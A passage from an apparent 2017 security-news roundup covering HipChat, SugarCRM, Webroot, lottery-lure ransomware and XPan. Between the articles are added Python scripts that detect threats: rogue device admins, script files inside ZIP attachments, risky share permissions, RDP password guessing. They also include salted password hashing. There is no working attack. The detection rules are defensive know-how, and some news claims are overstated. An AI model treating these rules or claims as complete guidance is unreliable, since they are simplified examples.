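"Enabled Device Admins" section and flag any admin receiver that is not on the
organisation's allowlist.  SAMPLE_DUMPSYS is constructed to resemble that dump;
the package names and the allowlist are invented for this example.
"""
from __future__ import annotations

import re

SAMPLE_DUMPSYS = """\
Current Device Policy Manager state:
  Enabled Device Admins (User 0, provisioningState: 0):
    com.example.corpmdm/.AdminReceiver:
      uid=10045
      testOnlyAdmin=false
      policies:
        force-lock
        wipe-data
    com.guide.fifa.mobile.free/.DevAdminReceiver:
      uid=10187
      testOnlyAdmin=false
      policies:
        force-lock
        wipe-data
        disable-camera
  Password owner: 0
"""

# Admin receivers the organisation knowingly deployed (assumption for the example).
KNOWN_GOOD_ADMINS = {"com.example.corpmdm/.AdminReceiver"}

# An admin entry is indented by exactly four spaces: "<package>/<receiver>:"
ADMIN_LINE = re.compile(r"^ {4}(\S+/\S+):\s*$")
# Policy names sit eight spaces deep under "policies:"
POLICY_LINE = re.compile(r"^ {8}([a-z-]+)\s*$")


def parse_device_admins(dump: str) -> dict[str, list[str]]:
    """Map each enabled admin receiver to the policies it holds."""
    admins: dict[str, list[str]] = {}
    current: str | None = None
    in_section = False
    for line in dump.splitlines():
        if "Enabled Device Admins" in line:
            in_section = True
            continue
        if not in_section:
            continue
        if re.match(r"^ {0,2}\S", line):
            break  # a heading indented by two spaces or less ends the section
        admin = ADMIN_LINE.match(line)
        if admin:
            current = admin.group(1)
            admins[current] = []
            continue
        policy = POLICY_LINE.match(line)
        if policy and current is not None:
            admins[current].append(policy.group(1))
    return admins


def unexpected_admins(dump: str, allowlist=KNOWN_GOOD_ADMINS) -> list[tuple[str, list[str]]]:
    """Admin receivers not on the allowlist, with the policies they hold."""
    return sorted(
        (name, policies)
        for name, policies in parse_device_admins(dump).items()
        if name not in allowlist
    )


if __name__ == "__main__":
    for name, policies in unexpected_admins(SAMPLE_DUMPSYS):
        print(f"REVIEW {name}: {', '.join(policies)}")
```

Anything reported here should be removed from the device-admin list before uninstalling, which is exactly the step FalseGuide tries to make users skip; the `wipe-data` and `force-lock` policies in the output show why an unexpected holder matters.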
Four Essential Security & Privacy Extensions for Chrome
26.4.2017 securityaffairs Security
Here are the top four extensions for the Chrome browser to keep your online activity safe, secure and private.
The recent global wave of cybercrimes, particularly via exploiting loopholes in many leading browsers, has put internet privacy and online security directly in the line of fire. Internet users, in general, are worried about securing their data against the threats posed by hackers and the vulnerabilities in their favorite browsers.
Talking about browsers, Chrome is one of the most used browsers in the world. Many extensions developed for the Chrome browser provide an added layer of security and privacy. Following is our review of the essential extensions for Chrome that can protect your online privacy.
Privacy Chrome Extensions
PureVPN Chrome Extension
What sets PureVPN extension apart from all other privacy extensions is its completeness. While users need a different extension for each category of privacy they may be looking for, PureVPN is an all-in-one package. It blocks ads, provides malware protection, protection against hackers and viruses, and encrypts any data sent over the internet. Of course, it allows users to change their location as well, enabling them to access geo-restricted content too. This easy-to-use Chrome extension contains quick access features that make it one of the most trending extensions currently being used by thousands of users around the world.
HTTPS Everywhere
While this extension only provides partial security, it is a great tool for users who are looking for better and more secure ways of encrypting their communication. HTTPS Everywhere works with many popular websites, communication platforms, as well as social media platforms, making instant communications secure around the world. It has been developed as a joint venture between The Tor Project and the Electronic Frontier Foundation.
Disconnect Search
This free Chrome extension has a specialized built-in feature that allows users to make private searches and browse anonymously on Chrome. The developers claim that they do not collect any private information, IP addresses or search logs, which makes it secure. Along with the free Chrome extension, the developers have also created it as a web service, which makes it simpler to use and configure according to users’ desired preferences.
Ghostery
This extension is known for its mysterious capabilities of revealing the “invisible” web. It can display a list of all trackers, web bugs, pixels on the page, and beacons. The invisible web is used by hundreds of websites to gather behavioral data of different users and then target them with related ads. Advanced options in the extension also allow users to specifically identify whether someone is tracking their browsing activities. Despite the detailed insight that this extension can provide, it doesn’t feature any tool to address the loopholes that compromise user data.
Atlassian HipChat group chat service hacked, change your password now!
26.4.2017 securityaffairs Hacking
Atlassian announced that unknown hackers broke into a cloud server of the company and accessed a huge amount of data of its group chat service HipChat.
On Monday, Atlassian reset user passwords for its group chat service HipChat after it notified its customers of a data breach. Unknown hackers broke into a cloud server of the company and stole a huge amount of data, including group chat logs.
According to Atlassian, attackers exploited a vulnerability in a “popular third-party” software library used by its HipChat.com service; the company did not reveal the name of the library.
“This weekend our Security Intelligence Team detected a security incident affecting a server in the HipChat Cloud web tier. The incident involved a vulnerability in a popular third-party library used by HipChat.com. We have found no evidence of other Atlassian systems or products being affected.” reads the security notice published by Atlassian.
“As a precaution, we have invalidated passwords on all HipChat-connected user accounts and sent those users instructions on how to reset their password.”
Hackers accessed user account data, including names, hashed passwords, and email addresses; according to the company, no financial data was exposed.
According to the company, hackers may also have stolen metadata from HipChat “rooms” or groups; this information could be used to extract information that is not intended to be public.
Attackers may also have stolen messages and content in chat rooms for about 0.05 percent of the instances.
“For the vast majority of instances (more than 99.95%), we have found no evidence that messages or content in rooms have been accessed.” continues the data breach notification.
The company ruled out that other systems or products (i.e. Jira, Confluence, or Trello) were affected.
The good news for users is that the hacked service uses the bcrypt algorithm for password hashing, which makes the stolen hashes hard to crack.
The company is already working to fix the vulnerability in the third-party library exploited by the hackers and is preparing an update for HipChat Server that will be shared with customers directly through the standard update channel.
Atlassian has also isolated the affected systems while actively working with law enforcement on the investigation of this hack.
If you are a HipChat user, change your password and be vigilant about phishing messages.
Critical flaw grants system access through monitor control applications
26.4.2017 Živě.cz Vulnerabilities
Security experts at SEC Consult have reported a critical vulnerability in an application developed by Portrait Displays and used by many monitor manufacturers: Sony, HP, Acer, Fujitsu, Philips, Dell, BenQ, Lenovo, Sharp and Toshiba. If exploited, it is possible to create new users on the system, change their privileges or modify user groups.
According to SEC Consult, the flaw primarily affects Fujitsu's DisplayView and Display Assistant, which is intended for HP monitors. Other applications from the manufacturers listed above may be affected as well. The developers at Portrait Displays quickly released a patch, but it now has to be rolled into updates by the individual manufacturers who build their software on the platform.
The fix should reach users through automatic updates, which Fujitsu for example supports. Otherwise users may remain exposed, because hardly anyone updates monitor control software by hand.
So if a Fujitsu or HP monitor sits on your desk and you have the control application installed, definitely look for security updates.
Scammers try their luck online with a lottery. After the attack they demand a ransom
26.4.2017 Novinky/Bezpečnost Fraud
Computer pirates are trying a new trick on the internet. Through unsolicited e-mails they lure victims with all sorts of lotteries. The warning comes from the Czech national security team CSIRT.CZ, which received a heads-up from its Slovenian colleagues. Similar attacks have so far been recorded mainly abroad.
“The Slovenian SI-CERT has published a report on a new wave of infected files sent via e-mail messages. They are sent under the pretext of lottery offers from retail chains or requests for representation at law firms,” warned Pavel Bašta, security analyst at CSIRT.CZ, which is operated by the CZ.NIC association.
According to him, besides the lottery the scammers also try to fool the gullible with other topics that may look interesting at first glance, for example information about changes in flight schedules or about provisions being lectured on at universities.
People cannot identify the cybercriminals in this case by where the e-mail is sent from. “There are many sources from which these messages are sent. But one thing connects them: they usually contain a single attachment, dokument_1.zip. That may in turn contain several documents, among them dokument_1.js, which tries to infect the computer,” Bašta added.
Hidden extortion viruses
An extortion virus usually hides among the documents. These malicious codes, collectively referred to as ransomware, can wreak havoc on a computer. First they encrypt all the data stored on the hard disk. The attackers then demand a ransom to make it accessible again, easily several thousand crowns.
They usually want to be paid in bitcoin, because movements of this virtual currency are practically untraceable, and so, logically, is the illegal activity of the computer pirates.
But even after paying the ransom, users do not get their data back. Instead of paying, the virus must be removed from the computer. Recovering data that was not backed up is, however, impossible in most cases.
Similar attacks via unsolicited e-mails have so far appeared abroad, mainly in Slovenia. It is nevertheless likely that cybercriminals will try to fool Czech users in the same way in the near future.
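The delivery chain described above (a ZIP attachment carrying a .js downloader) is exactly what a mail gateway can stop before the user double-clicks. The script below is an added example, not part of the CSIRT.CZ or SI-CERT advisories: it lists members of a ZIP attachment that Windows would execute directly, follows one ZIP nested inside another, and treats an unreadable archive as suspicious rather than letting it through. The attachment it inspects is constructed in memory from harmless placeholder bytes; the member names mirror the advisory, the contents do not.

```python
"""Reject e-mail attachments that are ZIP archives hiding script files.

Added example, not part of the CSIRT.CZ or SI-CERT advisories.  The campaign
described above delivers dokument_1.zip whose member dokument_1.js is what
actually runs; a mail gateway can stop such archives before a user opens them.
The attachment built here is constructed in memory and its members are
harmless placeholders, not the real files.
"""
from __future__ import annotations

import io
import zipfile

# Extensions that Windows will execute directly on double-click (Windows Script
# Host, the command shell, or the HTML Application host).
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh",
                     ".hta", ".cmd", ".bat", ".ps1", ".scr", ".exe")
MAX_NESTING = 3   # do not follow ZIP-in-ZIP forever


def build_constructed_attachment() -> bytes:
    """A stand-in for the dokument_1.zip described above (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("dokument_1.pdf", b"%PDF-1.4 constructed decoy\n")
        zf.writestr("dokument_1.js", b"// constructed placeholder, not the downloader\n")
    return buf.getvalue()


def build_constructed_nested_attachment() -> bytes:
    """The same payload wrapped in a second ZIP, a common trick against naive filters."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("dokumenty.zip", build_constructed_attachment())
    return buf.getvalue()


def scripts_in_archive(data: bytes, depth: int = 0) -> list[str]:
    """Names of members Windows would execute, including inside nested ZIPs.

    An archive that cannot be parsed is reported as such rather than passed
    through silently: the gateway should not guess in the attacker's favour."""
    if depth > MAX_NESTING:
        return ["<nested too deep>"]
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            hits: list[str] = []
            for info in zf.infolist():
                name = info.filename
                lower = name.lower()
                if lower.endswith(SCRIPT_EXTENSIONS):
                    hits.append(name)
                elif lower.endswith(".zip"):
                    hits.extend(f"{name}/{inner}"
                                for inner in scripts_in_archive(zf.read(info), depth + 1))
            return hits
    except (zipfile.BadZipFile, RuntimeError):   # RuntimeError: encrypted member
        return ["<unreadable archive>"]


def should_quarantine(filename: str, data: bytes) -> bool:
    """Decision for one attachment: quarantine ZIPs that carry executable members."""
    return filename.lower().endswith(".zip") and bool(scripts_in_archive(data))


if __name__ == "__main__":
    sample = build_constructed_attachment()
    print("dokument_1.zip ->", scripts_in_archive(sample),
          "quarantine:", should_quarantine("dokument_1.zip", sample))
```

Matching on the member name rather than on the outer filename is the point: the outer file is a plain ZIP, and the dangerous part is only visible once the archive is opened.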
Antivirus company mistakenly flagged system files as malware. Customers' Windows crashed
26.4.2017 Živě.cz Vulnerabilities
Antivirus vendor Webroot is currently dealing with an unpleasant affair that surely everyone in the industry secretly dreads. A few hours ago its security program wrongly flagged perfectly legitimate files as malware and blocked them. It is a classic false-positive case.
If it had been a handful of personal files in a user folder, it would probably be no big deal and the user would simply release the files from the quarantine; in this case, however, Webroot blocked system files of the Windows Insider Preview development build, among others. In practice this meant the system crashed and, naturally, refused to boot.
Neil Jackson @Jaxxnet
Webroot seem to have angered a lot of their customers.... the system is in utter meltdown after borking legit system and app files. Ooops.
00:56, 25. Apr. 2017
According to Ars Technica, the program also blocked some enterprise applications for other customers in a similar way. Webroot now has to resolve the thorny affair quickly, but its marketing department will probably be dealing with the fallout for quite a while yet.
iSupportU @isupportu
@Webroot everything is breaking, money is flying out the window... where are you? I have been on hold 20+min
01:20, 25. Apr. 2017
Pat Moore @DueMarauder
@Webroot What's the scoop on this false positive issue that has crippled a quarter of my customers?
00:30, 25. Apr. 2017
Microsoft released a fix pack for the Creators Update. It also addresses Connected Standby problems
26.4.2017 Cnews.cz Vulnerabilities
It isn't Patch Tuesday yet, but the new major version of Windows 10 needs fixing.
Anyone who has already moved to Windows 10 Creators Update may have seen a prompt to restart the device yesterday evening or this morning. Microsoft has released a pack of fixes, continuing the established tradition in which a fresh Windows 10 release receives updates more than once a month. Yesterday's update is designated KB4016240 and raises the build number to 15063.250.
It contains no new security patches, only fixes for reported bugs:
Virtual machines could lose network connectivity while IP addresses were being configured.
Remote ring did not work when using the RemoteRing Configuration Service Provider.
A memory leak could occur in Internet Explorer if a page with embedded frames loading content from several different domains was open.
Internet Explorer 11 did not save JavaScript files when exporting to MHT.
Users could be signed out of web applications.
The device's built-in display had its brightness set to a very low level. This happened if only an external display was used at startup and the display mode was then switched to the built-in display only.
Running Win32 and Direct3D applications or games in full-screen mode could prevent the system from waking from Connected Standby.
In the Professional edition and higher, the lock screen could not be disabled using the Local Group Policy Editor.
Due to a misconfiguration in the Windows Forms libraries, antivirus programs could stop working at computer startup.
A few compatibility problems in Internet Explorer and Edge were resolved.
Expert Discloses Several Flaws Found in Sugar CRM
26.4.2017 securityweek Vulnerebility
A researcher has discovered several vulnerabilities in SugarCRM’s popular customer relationship management (CRM) product. While most of the flaws appear to have been patched, the expert’s disclosure suggests that the vendor needs to make some improvements in how it communicates with individuals who report security holes.
Sugar is one of the most popular CRM solutions on the market. The product is used by many major organizations, including IBM, Audi, T-Mobile, HTC and Reebok.
Italy-based researcher Egidio Romano has been analyzing Sugar since 2011 and he claims to have identified more than 50 security issues. Many of the weaknesses were discovered during a virtual internship with the company that involved the analysis of SugarCRM Community Edition, which is open source.
While most of the vulnerabilities have been addressed, Romano disclosed over the weekend the details of several flaws that had apparently not been patched. After the researcher published his blog post, SugarCRM clarified that all the issues had in fact been fixed in the commercial version of its product.
The expert’s blog post describes CVE-2012-0694, a serialization-related code execution vulnerability he discovered back in 2012, and how last year he managed to find a way to bypass SugarCRM’s fix by leveraging a PHP flaw tracked as CVE-2016-7124.
During the summer of 2016, Romano also discovered several other vulnerabilities, including stored cross-site scripting (XSS), local file inclusion, SQL injection and authentication bypass vulnerabilities.
Some of the flaws could have been exploited by an unauthenticated attacker to gain access to user information, including names, email addresses, phone numbers, IP addresses, and credentials for services such as FTP, SSH, databases and VPNs.
Romano has also described a vulnerability involving SugarCRM’s updates.sugarcrm.com domain. According to the researcher, an attacker who manages to compromise this server may be able to hack all 2 million Sugar instances.
The expert said many of the flaws remain unpatched in the latest version of Sugar Community Edition.
In a security notice posted in response to Romano’s blog post, SugarCRM claimed all the vulnerabilities reported by the researcher last summer were patched in October with the release of Sugar 7.7.2.0.
SugarCRM has clarified that the company is focusing on its commercial products and the evolution of its open source program ended with the release of Sugar 7.
SugarCRM says it has been working on addressing the PHP-related serialization vulnerabilities and it plans on moving away from the use of this technique due to the risks it poses.
The firm said all of the flaws reported by Romano last summer had been classified as “medium” or “low” severity, and these types of weaknesses are no longer being patched in the Community Edition. Security holes that have a severity of “medium” or lower are not mentioned in release notes for the commercial product.
The vendor’s statement does not mention the communication issues it had in this case with the researcher. The company has however pointed out that it will make some changes to its policy concerning the inclusion of less severe vulnerabilities in its release notes.
HipChat Prompts Password Resets Following Server Hack
26.4.2017 securityweek Hacking
Group messaging platform HipChat this week prompted users to reset their passwords following a security incident involving one of its servers.
Atlassian-owned HipChat claims that a vulnerability in a popular third-party library used by HipChat.com was at fault, and that the incident affected only a server in the HipChat Cloud web tier. No other Atlassian systems or products appear to have been affected, the company says.
However, to ensure that users’ data remains secure, the company decided to invalidate passwords on all HipChat-connected user accounts. It also sent notifications to those users and provided them with details on how to reset their passwords.
The incident, HipChat Chief Security Officer Ganesh Krishnan reveals, resulted in attackers possibly accessing user account information such as name, email address and password (hashed using bcrypt with a random salt) for all instances (each of which is represented by a unique URL in the form company.hipchat.com). Room metadata such as room name and topic might have also been accessed.
In some cases, messages and content in rooms may have been accessed as well. The company says that, for more than 99.95% of instances, there was no evidence that messages or content in rooms have been accessed.
“Additionally, we have found no evidence of unauthorized access to financial and/or credit card information,” HipChat revealed.
HipChat Server uses the same third-party library, but it has been deployed in a manner that minimizes the risk of this type of attack, the company says, adding that an update will be shared to customers directly through the standard update channel.
“We are confident we have isolated the affected systems and closed any unauthorized access. To reiterate, we have found no evidence of other Atlassian systems or products being affected,” the company notes.
Atlassian continues to investigate the incident and says that it is actively working with law enforcement authorities on this matter.
Owned and operated by Atlassian Pty Ltd, HipChat is a chat platform that aims at providing business users with group chat, video chat, screen sharing and required security in a single app. It brings together services that teams might be using every day, features 256-bit SSL encryption, and also packs cloud integration and synchronization across devices.
In an emailed comment, Michael Patterson, CEO of Plixer International, pointed out to SecurityWeek that this incident once again proves that any tool a manufacturer uses can be abused for compromise.
“HipChat hashes passwords using bcrypt with a random salt, which adds a layer of security, and they reset the passwords associated with affected accounts. In this case the compromise came from a trusted 3rd party, which highlights that threat surfaces for any tool extend beyond the manufacturer themselves,” Patterson said.
He also noted that the compromise of ChatOps tools like HipChat can do a lot of harm within an organization: “ChatOps tools are used to support a DevOps and collaboration culture, meaning that teams of people as well as technology systems are dynamically connected and critical business processes can be automated. When a ChatOps tool becomes compromised, there is a high likelihood that the attacker can suddenly gain access across the most trusted and important system a company has.”
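Both HipChat articles above make the same point: the stolen password hashes were bcrypt with a random salt, which is what makes a leaked database expensive to crack. The code below is an added example, not Atlassian's, showing the two properties that matter (a fresh random salt per user and a work factor that can be raised later) together with the rehash-on-login pattern. bcrypt is not in the Python standard library, so the example uses PBKDF2-HMAC-SHA256 from `hashlib` as the slow hash; the iteration count, the record layout and the function names are assumptions of this example, not HipChat's.

```python
"""Salted, slow password hashing with rehash-on-login.

Added example, not Atlassian's code.  bcrypt is not in the Python standard
library, so PBKDF2-HMAC-SHA256 from hashlib stands in for it: like bcrypt it
takes a per-user random salt and a tunable work factor.  The iteration count
and the record layout are assumptions of this example.
"""
from __future__ import annotations

import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
CURRENT_ITERATIONS = 600_000   # assumed policy; raise as hardware gets faster


def hash_password(password: str, *, iterations: int = CURRENT_ITERATIONS,
                  salt: bytes | None = None) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest (hex)."""
    if salt is None:
        salt = os.urandom(16)   # per-user random salt: equal passwords, different hashes
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    try:
        algorithm, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if algorithm != ALGORITHM:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def needs_rehash(record: str, minimum_iterations: int = CURRENT_ITERATIONS) -> bool:
    """True when the record was made with a weaker work factor than current policy."""
    return int(record.split("$")[1]) < minimum_iterations


def login(password: str, record: str) -> tuple[bool, str | None]:
    """Verify a login; if the stored record is below policy, return an upgraded one.

    A hash can only be strengthened while the plaintext is available, i.e. at
    login time.  After a breach the right move is the one Atlassian took:
    invalidate every record and force a reset, because the old hashes are now
    in the attacker's hands however slow they are to crack."""
    if not verify_password(password, record):
        return False, None
    return True, (hash_password(password) if needs_rehash(record) else None)


if __name__ == "__main__":
    old = hash_password("correct horse battery staple", iterations=100_000)
    ok, upgraded = login("correct horse battery staple", old)
    print(ok, upgraded is not None and not needs_rehash(upgraded))
```

The record carries its own salt and cost, so the cost can be raised for new logins without a flag day; the `hmac.compare_digest` call avoids leaking, through timing, how many bytes of a guess matched.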
Organizations Fail to Maintain Principle of Least Privilege
26.4.2017 securityweek Security
Security requires that confidential commercial data is protected; compliance requires the same for personal information. The difficulty for business is that the sheer volume of data generated makes it hard to know where all the data resides and who has access to it. A new report shows that 47% of analyzed organizations in 2016 had at least 1,000 sensitive files open to every employee, and 22% had 12,000 or more.
These figures come from the Varonis 2016 Data Risk Assessments report. Each year Varonis conducts more than 1,000 risk assessments for both existing and potential customers. For its latest analysis of data risk, it has selected, at random, 80 of these assessments. They cover 33 industries in 12 different countries. Forty-two of the organizations have fewer than 1000 employees, and 38 have 1001 or more employees.
One of the problems highlighted by Varonis is that organizations fail to maintain the principle of least privilege in their access control. It found a total of 48 million folders, or an average of 20% of all folders, accessible to global groups. "Many data breaches are opportunistic or rudimentary in nature, and many originate from an insider, or an insider whose credentials or system has been hijacked," warns Varonis. "Excessive user access through global groups is a key failure point for many security and compliance audits."
That's not to say that all organizations fail. At one end of the scale, a government entity had only 29 of 290,000 folders open to everyone (with none containing sensitive files); while at the other end, an insurance firm had 35% of 86.4 million folders open to all employees.
Focusing more specifically on 'sensitive' files (potentially containing PII, PHI, card details, SSNs and intellectual property), Varonis found a similar range of access. One company in the construction trade had only 0.01% of almost 1000 sensitive files open to the everyone group. Conversely, a banking institution had 80% of more than 245,000 sensitive files accessible to every employee.
Apart from audit and compliance issues, Varonis points to the Panama Papers as an illustration of the dangers. In April 2016, 11.5 million confidential files belonging to the Panama law firm Mossack Fonseca were leaked to a German newspaper, revealing how its clients hid billions of dollars in tax havens.
Stale data is another risk highlighted in the report. Varonis defines stale data as any data that hasn't been touched in six months or more. "Stale data represents little value to the business while it's not being used, but still carries with it risk and potential financial liability if used inappropriately." It also adds a management and cost burden, especially if it is maintained on high-performance storage.
The amount of stale data found by Varonis ranged from just 0.03% (still 21 gigabytes of data) in an investment management firm, to 527 terabytes in more than 35,000 folders at an environment firm.
Varonis also found numerous problems with both permissions and passwords. Issues with permissions include protected folders found in deeper levels of the file system, which "may contain users and permissions which are not visible at the higher levels, leading an administrator to mistakenly assume that permissions to a folder are configured correctly."
Unresolved security identifiers are also a problem. These occur when a user on an ACL is deleted from Active Directory. "They can potentially give unauthorized users (like hackers) access to data," warns Varonis.
One of the problems with passwords is the tendency to allow non-expiring passwords, which, warns Varonis, "allow unlimited time to brute force crack them and indefinite access to data via the account." An insurance firm had 58% of its 246,865 users on non-expiring passwords. But an education organization had 100% of 257,000 users on such passwords -- and 90% of these were stale enabled users.
Varonis believes that organizations spend too much time and money defending against specific threats to keep attackers off the network, rather than protecting the data itself from both opportunistic insiders and hackers that breach the 'perimeter'. In January of this year, a separate report (PDF) from Forrester (commissioned by Varonis) concluded that "an overwhelming majority of companies face technical and organizational challenges with data security, are focused on threats rather than their data, and do not have a good handle on understanding and controlling sensitive data."
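The failure modes the report lists (global-group access to sensitive folders, unresolved SIDs left on ACLs, stale data, enabled stale accounts with non-expiring passwords) are all things a share inventory can be checked for mechanically. The script below is an added example, not Varonis's tooling: it runs those checks over a small constructed inventory. The paths, trustees, SIDs, account names, dates and the six-month threshold are invented or taken from the report's definitions for this example.

```python
"""Audit a file-share inventory for the risks in the Varonis report.

Added example, not Varonis's tooling.  Given folder records (trustees that can
read them, whether they hold sensitive files, last modification) and user
records, it reports folders open to global groups, sensitive folders among
them, ACL entries that are unresolved SIDs, stale folders, and enabled-but-
stale accounts with non-expiring passwords.  All records below are constructed;
paths, SIDs, account names and dates are invented.
"""
from __future__ import annotations

import re
from datetime import date, timedelta

GLOBAL_GROUPS = {"Everyone", "Authenticated Users", "Domain Users"}
STALE_AFTER = timedelta(days=183)   # the report's "six months or more"
# A raw domain SID on an ACL instead of a name: the account was deleted from AD.
UNRESOLVED_SID = re.compile(r"^S-1-5-21(?:-\d+){4}$")
AUDIT_DATE = date(2017, 4, 26)      # "today" for the constructed data

FOLDERS = [
    # (path, trustees with access, contains sensitive files, last modified)
    (r"\\fs01\Finance\Payroll", ["Everyone", r"DOMAIN\Finance"], True, date(2017, 3, 30)),
    (r"\\fs01\HR\Benefits", [r"DOMAIN\HR", "S-1-5-21-1004336348-1177238915-682003330-1517"], True, date(2016, 5, 2)),
    (r"\\fs01\Public\Templates", ["Authenticated Users"], False, date(2017, 4, 1)),
    (r"\\fs01\Legal\Archive2014", [r"DOMAIN\Legal"], True, date(2014, 11, 20)),
]
USERS = [
    # (account, password never expires, enabled, last logon)
    ("svc_backup", True, True, date(2016, 1, 10)),
    ("jdoe", False, True, date(2017, 4, 25)),
    ("old_intern", True, False, date(2015, 6, 1)),
]


def audit_folders(folders, today: date) -> dict[str, list]:
    """Classify each folder against the report's four folder-level risks."""
    findings: dict[str, list] = {"global_access": [], "sensitive_open": [],
                                 "unresolved_sids": [], "stale": []}
    for path, trustees, sensitive, modified in folders:
        if GLOBAL_GROUPS.intersection(trustees):
            findings["global_access"].append(path)
            if sensitive:                      # the audit finding that matters most
                findings["sensitive_open"].append(path)
        for trustee in trustees:
            if UNRESOLVED_SID.match(trustee):  # ghost ACE: nobody can say who this was
                findings["unresolved_sids"].append((path, trustee))
        if today - modified >= STALE_AFTER:
            findings["stale"].append(path)
    return findings


def global_access_ratio(folders) -> float:
    """Share of folders reachable through a global group (the report's 20% average)."""
    open_count = sum(1 for _, trustees, _, _ in folders if GLOBAL_GROUPS.intersection(trustees))
    return open_count / len(folders)


def risky_accounts(users, today: date) -> list[str]:
    """Enabled accounts that never log on but whose password never expires."""
    return [name for name, never_expires, enabled, last_logon in users
            if never_expires and enabled and today - last_logon >= STALE_AFTER]


if __name__ == "__main__":
    for kind, items in audit_folders(FOLDERS, AUDIT_DATE).items():
        print(f"{kind}: {items}")
    print(f"global access ratio: {global_access_ratio(FOLDERS):.0%}")
    print("risky accounts:", risky_accounts(USERS, AUDIT_DATE))
```

The "sensitive_open" list is the intersection the report keeps returning to: a folder that is both reachable by a global group and holds sensitive files is the first thing to fix, while a stale folder that nobody can read is a cost problem rather than a breach risk.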
"Many point products are designed to mitigate specific threats," said David Gibson, VP of strategy and market development with Varonis. "If they're used tactically, instead of supporting a strategy that improves the overall security of data, they can not only cost a lot of money, but also provide a false sense of security. Ransomware, for example, exploits the same internal deficiencies that a rogue or compromised insider might -- insufficient detective capabilities and over-subscribed access. Too many organizations look for tools that specifically address ransomware, but neglect to buttress core defenses that would mitigate more than just this specific threat."
XPan, I am your father
26.4.2017 Kaspersky Ransomware
.one ransomware decrypted
While we have previously written on the now infamous XPan ransomware family, some of its variants are still affecting users primarily located in Brazil. Harvesting victims via weakly protected RDP (Remote Desktop Protocol) connections, the criminals manually install the ransomware and encrypt any files that can be found on the system.
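Because this variant is installed by hand over weakly protected RDP, the useful detection is upstream of the encryption: a burst of failed RemoteInteractive logons from one source followed by a success. The script below is an added example, not part of Kaspersky's analysis; it runs that logic over constructed Windows Security events (event 4625 is a failed logon, 4624 a successful one, and logon type 10 is RemoteInteractive, i.e. RDP). The IP addresses, account names, timestamps and the threshold are invented for this example.

```python
"""Spot password guessing against RDP in Windows Security log events.

Added example, not part of Kaspersky's analysis.  A run of failed
RemoteInteractive logons (event 4625, logon type 10) followed by a success
(4624, type 10) from the same source is a strong signal that someone guessed
their way in.  The events below are constructed; IPs, accounts and times are
invented.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

FAILURE_THRESHOLD = 5            # failures inside WINDOW that raise an alert (assumed)
WINDOW = timedelta(minutes=10)


def _ev(time, event_id, logon_type, ip, account):
    """Shape a SIEM would hand over after parsing EVTX (constructed)."""
    return {"time": time, "event_id": event_id, "logon_type": logon_type,
            "source_ip": ip, "account": account}


SAMPLE_EVENTS = [
    _ev("2017-04-20T02:14:05", 4625, 10, "198.51.100.23", "administrator"),
    _ev("2017-04-20T02:14:09", 4625, 10, "198.51.100.23", "admin"),
    _ev("2017-04-20T02:14:14", 4625, 10, "198.51.100.23", "administrator"),
    _ev("2017-04-20T02:14:20", 4625, 10, "198.51.100.23", "suporte"),
    _ev("2017-04-20T02:14:27", 4625, 10, "198.51.100.23", "suporte"),
    _ev("2017-04-20T02:14:33", 4625, 10, "198.51.100.23", "suporte"),
    _ev("2017-04-20T02:15:01", 4624, 10, "198.51.100.23", "suporte"),   # guessed it
    _ev("2017-04-20T02:30:00", 4625, 3, "198.51.100.23", "backup"),      # network logon, not RDP
    _ev("2017-04-20T03:10:00", 4625, 10, "203.0.113.9", "jsilva"),
    _ev("2017-04-20T03:10:40", 4625, 10, "203.0.113.9", "jsilva"),       # two typos, no alert
    _ev("2017-04-20T09:00:00", 4624, 10, "192.0.2.5", "ti.admin"),       # normal morning RDP
]


def rdp_bruteforce_alerts(events, threshold=FAILURE_THRESHOLD, window=WINDOW):
    """One alert per source IP whose RDP failures reach `threshold` inside `window`.

    Each alert records the peak failure count, the accounts tried, and whether a
    successful RDP logon from that source came after the burst."""
    by_ip: dict[str, list[dict]] = defaultdict(list)
    for ev in events:
        if ev["logon_type"] == 10 and ev["event_id"] in (4624, 4625):
            by_ip[ev["source_ip"]].append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])          # ISO-8601 strings sort chronologically
        failures = [datetime.fromisoformat(e["time"]) for e in evs if e["event_id"] == 4625]
        peak, burst_end, start = 0, None, 0
        for i, t in enumerate(failures):           # sliding window over failure times
            while t - failures[start] > window:
                start += 1
            count = i - start + 1
            peak = max(peak, count)
            if count >= threshold and burst_end is None:
                burst_end = t
        if burst_end is None:
            continue
        success_after = any(e["event_id"] == 4624 and datetime.fromisoformat(e["time"]) > burst_end
                            for e in evs)
        alerts.append({
            "source_ip": ip,
            "peak_failures": peak,
            "accounts_tried": sorted({e["account"] for e in evs if e["event_id"] == 4625}),
            "success_after_burst": success_after,
        })
    return alerts


if __name__ == "__main__":
    for alert in rdp_bruteforce_alerts(SAMPLE_EVENTS):
        print(alert)
```

The `success_after_burst` flag is what turns a noisy "someone is guessing" alert into "someone is in": that is the moment to isolate the host, before the operator has had time to run the batch file described below.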
Interestingly, this XPan variant is not necessarily new in the malware ecosystem. However, someone has chosen to keep on infecting victims with it, encouraging security researchers to hunt for samples related to the increasing number of incident reports. This sample is what could be considered as the “father” of other XPan ransomware variants. A considerable amount of indicators within the source code depict the early origins of this sample.
“Recupere seus arquivos aqui.txt”, loosely translated as “recover your files here”, is a phrase that not many Brazilian users are eager to see on their desktops.
The ransomware author left a message for Kaspersky in other versions and has done the same in this one; together with traces of the NMoreira “CrypterApp.cpp”, there is a clear link between the different variants of this malware family.
NMoreira, XPan, TeamXRat, different names but same author.
